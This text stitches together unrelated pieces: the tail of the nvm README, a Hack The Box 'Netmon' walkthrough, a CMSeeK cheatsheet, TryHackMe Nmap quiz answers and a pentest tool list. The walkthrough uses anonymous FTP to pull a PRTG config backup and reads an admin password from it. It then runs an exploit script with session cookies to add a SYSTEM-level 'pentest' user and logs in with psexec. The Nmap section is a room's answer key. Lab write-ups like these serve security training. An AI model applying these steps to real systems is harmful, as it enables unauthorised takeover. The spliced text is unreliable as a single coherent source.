https://raw.githubusercontent.com/nvm-sh/nvm/v0.38.0/install.sh | bash ``` The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries. As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node). <a id="removal"></a> ## Uninstalling / Removal ### Manual Uninstall To remove `nvm` manually, execute the following: ```sh $ rm -rf "$NVM_DIR" ``` Edit `~/.bashrc` (or other shell resource config) and remove the lines below: ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion ``` ## Docker For Development Environment To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 18.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository: ```sh $ docker build -t nvm-dev . ``` This will package your current nvm repository with our pre-defined development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`: ```sh $ docker images REPOSITORY TAG IMAGE ID CREATED SIZE nvm-dev latest 9ca4c57a97d8 7 days ago 650 MB ``` If you got no error message, now you can easily involve in: ```sh $ docker run -h nvm-dev -it nvm-dev nvm@nvm-dev:~/.nvm$ ``` Please note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage. For more information and documentation about docker, please refer to its official website: - https://www.docker.com/ - https://docs.docker.com/ ## Problems - If you try to install a node version and the installation fails, be sure to run `nvm cache clear` to delete cached node downloads, or you might get an error like the following: curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume. - Where's my `sudo node`? Check out [#43](https://github.com/nvm-sh/nvm/issues/43) - After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source: ```sh nvm install -s 0.8.6 ``` - If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/nvm-sh/nvm/issues/658)) ## macOS Troubleshooting **nvm node version not found in vim shell** If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run: ```shell sudo chmod ugo-x /usr/libexec/path_helper ``` More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x). **nvm is not compatible with the npm config "prefix" option** Some solutions for this issue can be found [here](https://github.com/nvm-sh/nvm/issues/1245) There is one more edge case causing this issue, and that's a **mismatch between the `$HOME` path and the user's home directory's actual name**. You have to make sure that the user directory name in `$HOME` and the user directory name you'd see from running `ls /Users/` **are capitalized the same way** ([See this issue](https://github.com/nvm-sh/nvm/issues/2261)). To change the user directory and/or account name follow the instructions [here](https://support.apple.com/en-us/HT201548) [1]: https://github.com/nvm-sh/nvm.git [2]: https://github.com/nvm-sh/nvm/blob/v0.38.0/install.sh [3]: https://travis-ci.org/nvm-sh/nvm [4]: https://github.com/nvm-sh/nvm/releases/tag/v0.38.0 [Urchin]: https://github.com/scraperwiki/urchin [Fish]: http://fishshell.com **Homebrew makes zsh directories unsecure** ```shell zsh compinit: insecure directories, run compaudit for list. Ignore insecure directories and continue [y] or abort compinit [n]? y ``` Homebrew causes insecure directories like `/usr/local/share/zsh/site-functions` and `/usr/local/share/zsh`. This is **not** an `nvm` problem - it is a homebrew problem. Refer [here](https://github.com/zsh-users/zsh-completions/issues/680) for some solutions related to the issue. **Macs with M1 chip** _January 2021:_ there are no pre-compiled NodeJS binaries for versions prior to 15.x for Apple's new M1 chip (arm64 architecture). Some issues you may encounter: - using `nvm` to install, say, `v14.15.4`: - the C code compiles successfully - but crashes with an out of memory error when used - increasing the memory available to node still produces the out of memory errors: ```sh $ NODE_OPTIONS="--max-old-space-size=4096" ./node_modules/.bin/your_node_package ``` - when using `nvm` to install some versions, the compilation fails One solution to this issue is to change the architecture of your shell from arm64 to x86. Let's assume that: - you already have versions `12.20.1` and `14.15.4` installed using `nvm` - the current version in use is `14.15.4` - you are using the `zsh` shell - you have Rosetta 2 installed (macOS prompts you to install Rosetta 2 the first time you open a Intel-only non-command-line application, or you may install Rosetta 2 from the command line with `softwareupdate --install-rosetta`) ```sh # Check what version you're running: $ node --version v14.15.4 # Check architecture of the `node` binary: $ node -p process.arch arm64 # This confirms that the arch is for the M1 chip, which is causing the problems. # So we need to uninstall it. # We can't uninstall the version we are currently using, so switch to another version: $ nvm install v12.20.1 # Now uninstall the version we want to replace: $ nvm uninstall v14.15.4 # Launch a new zsh process under the 64-bit X86 architecture: $ arch -x86_64 zsh # Install node using nvm. This should download the precompiled x64 binary: $ nvm install v14.15.4 # Now check that the architecture is correct: $ node -p process.arch x64 # It is now safe to return to the arm64 zsh process: $ exit # We're back to a native shell: $ arch arm64 # And the new version is now available to use: $ nvm use v14.15.4 Now using node v14.15.4 (npm v6.14.10) ``` ## Maintainers Currently, the sole maintainer is [@ljharb](https://github.com/ljharb) - more maintainers are quite welcome, and we hope to add folks to the team over time. [Governance](./GOVERNANCE.md) will be re-evaluated as the project evolves. ## License See [LICENSE.md](./LICENSE.md). ## Copyright notice Copyright [OpenJS Foundation](https://openjsf.org) and `nvm` contributors. All rights reserved. The [OpenJS Foundation](https://openjsf.org) has registered trademarks and uses trademarks. For a list of trademarks of the [OpenJS Foundation](https://openjsf.org), please see our [Trademark Policy](https://trademark-policy.openjsf.org/) and [Trademark List](https://trademark-list.openjsf.org/). Node.js is a trademark of Joyent, Inc. and is used with its permission. Trademarks and logos not indicated on the [list of OpenJS Foundation trademarks](https://trademark-list.openjsf.org) are trademarks™ or registered® trademarks of their respective holders. Use of them does not imply any affiliation with or endorsement by them. [The OpenJS Foundation](https://openjsf.org/) | [Terms of Use](https://terms-of-use.openjsf.org/) | [Privacy Policy](https://privacy-policy.openjsf.org/) | [OpenJS Foundation Bylaws](https://bylaws.openjsf.org/) | [Trademark Policy](https://trademark-policy.openjsf.org/) | [Trademark List](https://trademark-list.openjsf.org/) | [Cookie Policy](https://www.linuxfoundation.org/cookies/)
# Netmon URL: https://app.hackthebox.com/machines/Netmon Level: Easy Date 8 Jun 2020 ## Walkthrough - [Enumeration](#enumeration) - [User flag](#user-flag) - [Privesc](#privesc) # Enumeration ## NMAP ``` # Nmap 7.80 scan initiated Mon Jun 8 23:10:00 2020 as: nmap -p- -A -T4 -oN nmap.txt 10.10.10.152 Nmap scan report for 10.10.10.152 Host is up (0.045s latency). Not shown: 65523 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-03-19 12:18AM 1024 .rnd | 02-25-19 10:15PM <DIR> inetpub | 07-16-16 09:18AM <DIR> PerfLogs | 02-25-19 10:56PM <DIR> Program Files | 02-03-19 12:28AM <DIR> Program Files (x86) | 02-03-19 08:08AM <DIR> Users |_02-25-19 11:49PM <DIR> Windows | ftp-syst: |_ SYST: Windows_NT 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=6/8%OT=21%CT=1%CU=36072%PV=Y%DS=2%DC=T%G=Y%TM=5EDEAC87 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=105%TI=I%CI=I%II=I%SS=S%TS=A) OS:OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54D OS:NW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000) OS:ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+% OS:F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T= OS:80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0% OS:Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S= OS:A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R= OS:Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N% OS:T=80%CD=Z) Network Distance: 2 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -3s, deviation: 0s, median: -4s |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-08T21:24:13 |_ start_date: 2020-06-08T21:09:31 TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 44.61 ms 10.10.14.1 2 45.24 ms 10.10.10.152 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jun 8 23:24:23 2020 -- 1 IP address (1 host up) scanned in 864.17 seconds ``` Webserver shows PRTG interface. We also know that FTP allows anonymous access. We do a Google research to unleash where PRTG stores credentials: https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data ``` root@kali:/opt/htb/Netmon# ftp ftp> open 10.10.10.152 Connected to 10.10.10.152. 220 Microsoft FTP Service Name (10.10.10.152:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-03-19 12:18AM 1024 .rnd 02-25-19 10:15PM <DIR> inetpub 07-16-16 09:18AM <DIR> PerfLogs 02-25-19 10:56PM <DIR> Program Files 02-03-19 12:28AM <DIR> Program Files (x86) 02-03-19 08:08AM <DIR> Users 02-25-19 11:49PM <DIR> Windows 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> ls -la 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-25-19 11:44PM <DIR> Administrator 07-16-16 09:28AM <DIR> All Users 02-03-19 08:05AM <DIR> Default 07-16-16 09:28AM <DIR> Default User 07-16-16 09:16AM 174 desktop.ini 02-03-19 12:35AM <DIR> Public 226 Transfer complete. ftp> cd All Users 550 The system cannot find the file specified. ftp> cd "All Users" 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-03-19 12:15AM <DIR> Licenses 11-20-16 10:36PM <DIR> Microsoft 02-03-19 12:18AM <DIR> Paessler 02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft 07-16-16 09:18AM <DIR> SoftwareDistribution 02-03-19 12:15AM <DIR> TEMP 11-20-16 10:19PM <DIR> USOPrivate 11-20-16 10:19PM <DIR> USOShared 02-25-19 10:56PM <DIR> VMware 226 Transfer complete. ftp> ls -la 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-03-19 08:05AM <DIR> Application Data 02-03-19 08:05AM <DIR> Desktop 02-03-19 08:05AM <DIR> Documents 02-03-19 12:15AM <DIR> Licenses 11-20-16 10:36PM <DIR> Microsoft 02-03-19 12:18AM <DIR> Paessler 02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft 07-16-16 09:18AM <DIR> SoftwareDistribution 02-03-19 08:05AM <DIR> Start Menu 02-03-19 12:15AM <DIR> TEMP 02-03-19 08:05AM <DIR> Templates 11-20-16 10:19PM <DIR> USOPrivate 11-20-16 10:19PM <DIR> USOShared 02-25-19 10:56PM <DIR> VMware 226 Transfer complete. ftp> cd "Application Data" 550 Access is denied. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-03-19 12:15AM <DIR> Licenses 11-20-16 10:36PM <DIR> Microsoft 02-03-19 12:18AM <DIR> Paessler 02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft 07-16-16 09:18AM <DIR> SoftwareDistribution 02-03-19 12:15AM <DIR> TEMP 11-20-16 10:19PM <DIR> USOPrivate 11-20-16 10:19PM <DIR> USOShared 02-25-19 10:56PM <DIR> VMware 226 Transfer complete. ftp> cd Paessler 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 07-03-20 04:45AM <DIR> PRTG Network Monitor 226 Transfer complete. ftp> cd "PRTG Network Monitor" 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 07-02-20 10:27PM <DIR> Configuration Auto-Backups 07-02-20 09:47PM <DIR> Log Database 02-03-19 12:18AM <DIR> Logs (Debug) 02-03-19 12:18AM <DIR> Logs (Sensors) 02-03-19 12:18AM <DIR> Logs (System) 07-03-20 12:00AM <DIR> Logs (Web Server) 07-02-20 09:52PM <DIR> Monitoring Database 02-25-19 10:54PM 1189697 PRTG Configuration.dat 02-25-19 10:54PM 1189697 PRTG Configuration.old 07-14-18 03:13AM 1153755 PRTG Configuration.old.bak 07-03-20 04:45AM 1715450 PRTG Graph Data Cache.dat 02-25-19 11:00PM <DIR> Report PDFs 02-03-19 12:18AM <DIR> System Information Database 02-03-19 12:40AM <DIR> Ticket Database 02-03-19 12:18AM <DIR> ToDo Database 226 Transfer complete. ftp> exit 221 Goodbye. ``` File "PRTG Configuration.dat" shows encrypted credential: ``` root@kali:/opt/htb/Netmon# grep -A 20 prtgadmin "PRTG Configuration.dat" prtgadmin </login> <name> PRTG System Administrator </name> <ownerid> 100 </ownerid> <password> <flags> <encrypted/> </flags> <cell col="0" crypt="PRTG"> JO3Y7LLK7IBKCMDN3DABSVAQO5MR5IDWF3MJLDOWSA====== </cell> <cell col="1" crypt="PRTG"> OEASMEIE74Q5VXSPFJA2EEGBMEUEXFWW </cell> </password> <playsound> 0 ``` While the other one...: ``` root@kali:/opt/htb/Netmon# grep -A 20 prtgadmin "PRTG Configuration.old.bak" <!-- User: prtgadmin --> PrTg@dmin2018 ``` We can assume that now password has been replace with current year (2019). From here, we can access through web interface and grab cookie file. Now we can use this exploit: ``` ./prtg.sh -u http://10.10.10.152 -c "_ga=GA1.4.958955151.1591652317; _gid=GA1.4.2070767730.1591652317; OCTOPUS1813713946=e0JBRDY4Qjg1LTQxNUQtNDQ4Qy05QkFELTZBNjg3NDUyQUM3QX0%3D" ``` This exploit goal is to add a "pentest" user with SYSTEM privilege. We can now access with `psexec` (from Impacket suite): ``` cd /opt/impacket/ psexec.py pentest:'P3nT3st!'@10.10.10.152 ```
## Description **CMSeeK** scans WordPress, Joomla, Drupal and over 180 other CMSs. A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. ## Cheatsheat ``` SPECIFING TARGET: -u URL, --url URL Target Url -l LIST, --list LIST Path of the file containing list of sites for multi-site scan (comma separated) MANIPULATING SCAN: -i cms, --ignore--cms cms Specify which CMS IDs to skip in order to avoid flase positive. separated by comma "," --strict-cms cms Checks target against a list of provided CMS IDs. separated by comma "," --skip-scanned Skips target if it's CMS was previously detected. RE-DIRECT: --follow-redirect Follows all/any redirect(s) --no-redirect Skips all redirects and tests the input target(s) USER AGENT: -r, --random-agent Use a random user agent --googlebot Use Google bot user agent --user-agent USER_AGENT Specify a custom user agent OUTPUT: -v, --verbose Increase output verbosity VERSION & UPDATING: --update Update CMSeeK (Requires git) --version Show CMSeeK version and exit HELP & MISCELLANEOUS: -h, --help Show this help message and exit --clear-result Delete all the scan result --batch Never ask you to press enter after every site in a list is scanned EXAMPLE USAGE: docker run -it --rm secsi/cmseek -u <target_url> # Scan <target_url> docker run -it --rm secsi/cmseek -u <target_url> --user-agent Mozilla 5.0 # Scan <target_url> using custom user-Agent Mozilla is 5.0 used here docker run -it --rm secsi/cmseek -u <target_url> --random-agent # Scan <target_url> using a random user-Agent docker run -it --rm secsi/cmseek -v -u <target_url> # enabling verbose output while scanning <target_url> ```
# Nmap Get experience with Nmap, a powerful network scanning tool. [Nmap](https://tryhackme.com/room/rpnmap) ## Topic's * NMAP Fundamentals * Network Enumeration ## Task 1 Introduction to Port Scanning When it comes to hacking, knowledge is power. The more knowledge you have about a target system or network, the more options you have available. This makes it imperative that proper enumeration is carried out before any exploitation attempts are made. Say we have been given an IP (or multiple IP addresses) to perform a security audit on. Before we do anything else, we need to get an idea of the “landscape” we are attacking. What this means is that we need to establish which services are running on the targets. For example, perhaps one of them is running a webserver, and another is acting as a Windows Active Directory Domain Controller. The first stage in establishing this “map” of the landscape is something called port scanning. When a computer runs a network service, it opens a networking construct called a “port” to receive the connection. Ports are necessary for making multiple network requests or having multiple services available. For example, when you load several webpages at once in a web browser, the program must have some way of determining which tab is loading which web page. This is done by establishing connections to the remote webservers using different ports on your local machine. Equally, if you want a server to be able to run more than one service (for example, perhaps you want your webserver to run both HTTP and HTTPS versions of the site), then you need some way to direct the traffic to the appropriate service. Once again, ports are the solution to this. Network connections are made between two ports – an open port listening on the server and a randomly selected port on your own computer. For example, when you connect to a web page, your computer may open port 49534 to connect to the server’s port 443. ![](https://i.imgur.com/3XAfRpI.png) As in the previous example, the diagram shows what happens when you connect to numerous websites at the same time. Your computer opens up a different, high-numbered port (at random), which it uses for all its communications with the remote server. Every computer has a total of 65535 available ports; however, many of these are registered as standard ports. For example, a HTTP Webservice can nearly always be found on port 80 of the server. A HTTPS Webservice can be found on port 443. Windows NETBIOS can be found on port 139 and SMB can be found on port 445. It is important to note; however, that especially in a CTF setting, it is not unheard of for even these standard ports to be altered, making it even more imperative that we perform appropriate enumeration on the target. If we do not know which of these ports a server has open, then we do not have a hope of successfully attacking the target; thus, it is crucial that we begin any attack with a port scan. This can be accomplished in a variety of ways – usually using a tool called nmap, which is the focus of this room. Nmap can be used to perform many different kinds of port scan – the most common these will be introduced in upcoming tasks; however, the basic theory is this: nmap will connect to each port of the target in turn. Depending on how the port responds, it can be determined as being open, closed, or filtered (usually by a firewall). Once we know which ports are open, we can then look at enumerating which services are running on each port – either manually, or more commonly using nmap. So, why nmap? The short answer is that its currently the industry standard for a reason: no other port scanning tool comes close to matching its functionality (although some newcomers are now matching it for speed). It is an extremely powerful tool – made even more powerful by its scripting engine which can be used to scan for vulnerabilities, and in some cases even perform the exploit directly! Once again, this will be covered more in upcoming tasks. For now, it is important that you understand: what port scanning is; why it is necessary; and that nmap is the tool of choice for any kind of initial enumeration. 1. What networking constructs are used to direct traffic to the right application on a server? `Ports` 2. How many of these are available on any network-enabled computer? `65535` 3. [Research] How many of these are considered "well-known"? (These are the "standard" numbers mentioned in the task) `1024` ## [Task 2] Deploy! Nmap is an incredibly valuable tool in the world of penetration testing. In this room, we will cover the basics of using Nmap to effectively scan a target, gaining insight for further attacks! Here's a link to the companion video for this room in case you're stuck! [Link](https://www.youtube.com/watch?v=AEbVb5xQqzs) 1. Deploy the machine! > `No answer needed` ## [Task 3] Nmap Quiz A short quiz on the more useful switches that we can use with Nmap. All you'll need for this is the help menu for nmap. Include all parts of the switch unless otherwise specified, this includes - 1. First, how do you access the help menu? > `-h` 2. Often referred to as a stealth scan, what is the first switch listed for a 'Syn Scan'? > `-sS` 3. Not quite as useful but how about a 'UDP Scan'? > `-sU` 4. What about operating system detection? > `-O` 5. How about service version detection? > `-sV` 6. Most people like to see some output to know that their scan is actually doing things, what is the verbosity flag? > `-V` 7. What about 'very verbose'? (A personal favorite) > `-VV` 8. Sometimes saving output in a common document format can be really handy for reporting, how do we save output in xml format? > `-oX` 9. Aggressive scans can be nice when other scans just aren't getting the output that you want and you really don't care how 'loud' you are, what is the switch for enabling this? > `-A` 10. How do I set the timing to the max level, sometimes called 'Insane'? > `-T5` 11. What about if I want to scan a specific port? > `-p` 12. How about if I want to scan every port? > `-p-` 13. What if I want to enable using a script from the nmap scripting engine? For this, just include the first part of the switch without the specification of what script to run. > `--script` 14. What if I want to run all scripts out of the vulnerability category? > `--script vuln` 15. What switch should I include if I don't want to ping the host? > `-Pn` ### Nmap Scanning Perform some basic nmap scanning and learn to read through the results 1. Let's go ahead and start with the basics and perform a syn scan on the box provided. What will this command be without the host IP address? > `nmap -sS` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-10 02:12 EDT Nmap scan report for 10.10.187.161 Host is up (0.035s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds ``` 2. After scanning this, how many ports do we find open under 1000? > `2` 3. What communication protocol is given for these ports following the port number? > `tcp` 4. Perform a service version detection scan, what is the version of the software running on port 22? `sudo nmap -sS -sV $IP` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-10 02:14 EDT Nmap scan report for 10.10.187.161 Host is up (0.065s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.86 seconds ``` > `6.6.1p1` 5. Perform an aggressive scan, what flag isn't set under the results for port 80? `sudo nmap -A -sS -sV $IP` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-10 02:15 EDT Nmap scan report for 10.10.187.161 Host is up (0.034s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 65:d2:54:74:02:d9:8f:44:c2:f1:0c:04:bd:c2:cc:6c (DSA) | 2048 2b:6e:c1:a2:05:ee:8b:55:84:c4:06:a2:62:1d:38:c9 (RSA) | 256 dd:22:8a:1a:bd:02:e4:de:54:66:6a:bf:7c:2a:13:4b (ECDSA) |_ 256 05:d5:4d:63:0c:10:58:ba:75:7a:b4:d6:08:1f:3f:7c (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.7 (Ubuntu) | http-title: Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Develop... |_Requested resource was login.php No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=9/10%OT=22%CT=1%CU=43388%PV=Y%DS=2%DC=T%G=Y%TM=5F59C48 OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OPS OS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1 OS:1NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 111/tcp) HOP RTT ADDRESS 1 34.14 ms 10.8.0.1 2 34.61 ms 10.10.187.161 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.09 seconds ``` > `httponly` 6. Perform a script scan of vulnerabilities associated with this box, what denial of service (DOS) attack is this box susceptible to? Answer with the name for the vulnerability that is given as the section title in the scan output. A vuln scan can take a while to complete. In case you get stuck, the answer for this question has been provided in the hint, however, it's good to still run this scan and get used to using it as it can be invaluable. `nmap --script vuln $IP` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-10 02:24 EDT Nmap scan report for 10.10.187.161 Host is up (0.054s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh |_clamav-exec: ERROR: Script execution failed (use -d to debug) 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-cookie-flags: | /: | PHPSESSID: | httponly flag not set | /login.php: | PHPSESSID: |_ httponly flag not set |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /login.php: Possible admin folder | /robots.txt: Robots file | /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' | /docs/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' |_ /external/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. Nmap done: 1 IP address (1 host up) scanned in 323.65 seconds ``` > `http-slowloris-check`
# Penetration Testing Methodology > Penetration testing Process, Methods and Real world Attacks Collections ## Framework and Testing Guide - [OWASP](https://www.owasp.org/index.php/OWASP_Testing_Project) - Open Web Applicaiton Security Project - [PTES](http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines)- Penetration Testing Execution Standard - [PCI DSS](https://www.pcisecuritystandards.org/documents/Penetration-Testing-Guidance-v1_1.pdf) PCI Penetration Testing Guide - [PTF](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Penetration Testing Framework - [OSSTMM](http://www.isecom.org/research/) - Open Source Security Testing Methodology Manual ## Pre Engagement ### VMware - vmplayer - vmware workstation - vmware esxi #### Windows - windows 7/8/10 #### Linux - kali - Debian - ubuntu - Arch - Gentoo ### Wifi Adapter - [Alpha](https://www.alfa.com.tw/) - [TPLink](https://www.tp-link.com/my/products/list-11.html) - [Panda](http://www.pandawireless.com/Drivers%20%7C%20Panda%20Wireless.html) - [Detroit DIY](http://detroit-electronics.com/wifi-for-raspberry-pi-antenna) ### Spectrum Analyser - [Kaltman Creations HF-4060](https://kaltmancreationsllc.com/category/rf-analyzers/) ### Open Source Software - [Maltego](http://www.paterva.com/web7/) - Maltego is an interactive data mining tool that renders directed graphs for link analysis. - [Metasploit Framework ](https://metasploit.com/) - collection of remote exploits and post exploitation tools for all platforms - [SET toolkit](https://github.com/trustedsec/social-engineer-toolkit) - designed to perform advanced attacks against the human element. - [theHarvester](https://github.com/laramies/theHarvester) - gathering e-mail accounts, user names and hostnames/subdomains from different public sources - [mimikat](https://github.com/gentilkiwi/mimikatz) - extract plain or hash of password. - dig - bind-utils - [THC Hydra](http://sectools.org/tool/hydra/) - for brute force - [Powersploit](https://github.com/PowerShellMafia/PowerSploit) - a collection of Microsoft PowerShell modules - [CrackmapExec](https://github.com/byt3bl33d3r/CrackMapExec/wiki) - post exploitation tools for Active Directory. - [Burpsuite](https://portswigger.net/burp) - can use as proxy as well as active scanner - [Empire](https://github.com/EmpireProject/Empire) - powershell framework for remote and post exploitation. - [Nmap](https://nmap.org/) - port scanner - [knockpy](https://github.com/guelfoweb/knock) - subdomain scanner - [netcat](https://nmap.org/ncat/) - network utility - [nishang](https://github.com/samratashok/nishang) - post exploitation powershell Framework ### Checklist - Determination of the type of pentest (Blackbox, Whitebox) - Key objectives behind this penetration test - Location address and contact (if it is an onsite job) - Validation that the Authorization Letter has been signed - URL of the web application that is in scope and validation that isaccessible - 2 sets of credentials (normal and admin or a privilege user) and validation that are working - Determination of the environment (Production or UAT) - Number of static and dynamic pages - Testing Boundaries (DoS, Brute force attacks etc.) - Technologies (PHP, ASP, .NET, IIS, Apache, Operating system etc.) - Any VPN or port numbers are needed and verify those ahead of time - Any web services that the site may use. - Any pages that the client does not want to be tested. - Any pages that submit emails - IP address of the tester - Escalation contact - 3rd parties that needs to be contacted in advance of the pentest - Web application firewalls and other IDS in place - Timeframe of the assessment (dates and hours) - Diagrams and any kind of documentation 